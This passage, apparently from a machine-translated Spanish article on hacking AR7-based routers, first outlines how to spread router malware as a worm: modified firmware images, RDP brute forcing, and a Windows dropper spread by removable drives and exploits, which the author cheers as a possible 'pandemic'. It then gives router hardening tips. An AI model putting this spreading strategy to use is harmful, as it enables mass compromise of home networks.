Primero, debe verificar la versión del firmware/kernel y el modelo del enrutador, porque puede haber
serias diferencias en el trabajo. A continuación, en lugar de firmware en blanco, debe descargar
Imagen del sistema de archivos del enrutador, descomprimir, modificar y enviar.
atrás. Esto eliminará los problemas que surgen con la compatibilidad en diferentes
modelos/versiones de firmware, porque la estabilidad de funcionamiento es lo más importante para usted.
Además, un virus puede tener las funciones de un gusano y, si lo deseas, siempre puedes
conecte un escáner de red, fuerza bruta para RDP y funciones similares.

Hay otra excelente manera de distribuir. Nada te impide escribir
programa para Windows, que tendrá consigo (o descargará desde su
server) imagen del sistema de archivos e infectar el enrutador con ella, si está presente.
Distribuya este programa de todas las formas "estándar": unidades extraíbles,
exploits para programas, infección de otros programas... Combinando estos métodos,
Puedes crear una pandemia grave. Imagínense esta imagen; después de todo
Estos dispositivos están en todas partes.

Protección del enrutador

Habiendo desenterrado todo esto, pensé: ¿cómo puedo proteger el enrutador? Y luego, ya ves, y
Yo mismo llegaré allí. El primer paso es cambiar la contraseña de usuario por una más compleja y
de largo (límite de 8 caracteres), cambiar pancartas y saludos de servicio
(editor hexadecimal o, preferiblemente, recompilar programas) para
nmap u otros escáneres no pudieron determinar las versiones del servicio.

También deberías cambiar los puertos en los que se cuelgan los demonios. Esto se hace por
modificaciones a progdefs.xml. Mata telnet (la forma más fácil de adivinar la contraseña, sí
y el protocolo está desprotegido, ¿por qué lo necesitamos), habilitar el firewall, permitir la conexión?
acceder a los servicios sólo desde su propia dirección IP o MAC. Utilice también un cortafuegos
Para proteger una red o una computadora, no en vano está presente. Configuración inteligente
Las reglas siempre te ayudarán a protegerte.

Conclusión

Muchos, no solo los enrutadores D-Link y otros dispositivos similares están integrados en
Chip AR7, la lista incluye Acorp, NetGear, Linksys, Actionec... Bastante
Este AR7 es popular junto con MontaVista. De ello se deduce que, utilizando el mismo
cadena de herramientas, podrás realizar los pasos descritos en el artículo sin ningún problema.

Piénsalo: además de acciones dañinas, también puedes hacer algo útil/agradable para ti mismo
y otros (no discuto, el placer de piratear no se puede reemplazar, pero aún así).
Puedes crear tu propio firmware, por ejemplo, enrutadores más potentes que puedan
descargar/distribuir torrents... Todos los modelos tienen una interfaz USB 1.1, pero en los más jóvenes
modelos no está soldado. Agregue un módulo USB y un controlador de sistema de archivos al kernel,
equipe el enrutador con memoria Flash y, al final, obtendrá una especie de almacenamiento de red para
poco dinero. Hay muchas opciones, pero las ideas deberían surgir por miles, no
¡Limítate, crea y crea!



Popular en la categoría:
Cómo combinar capas en Photoshop en una o combinarlas en un grupo Cómo combinar varias capas en Photoshop
Cómo fusionar capas en Photoshop en una o combinarlas en un grupo...
leer
Transferir contactos a un nuevo teléfono Android
Transferir contactos a un nuevo teléfono Android
leer
Samsung Galaxy se reinicia solo - Soluciones Galaxy note 4 se reinicia solo
Samsung Galaxy se reinicia solo - Soluciones Galaxy Note...
leer
Características clave de Kaspersky Rescue Disk
Características clave de Kaspersky Rescue Disk
leer

Últimos artículos
MacBook no se conecta a wifi MacBook no ve...
leer
Cómo ganar dinero con WebMoney
leer
Tableta "Supra": opiniones de clientes
leer
Ubicaciones de barcos en tiempo real
leer
Los mejores programas para Android Grabar llamadas desde...
leer
Eliminar a los no seguidores en Twitter
leer
Conexión a Internet en una computadora portátil: todo lo posible...
leer
Samsung Galaxy S IV es el nuevo buque insignia...
leer
Arriba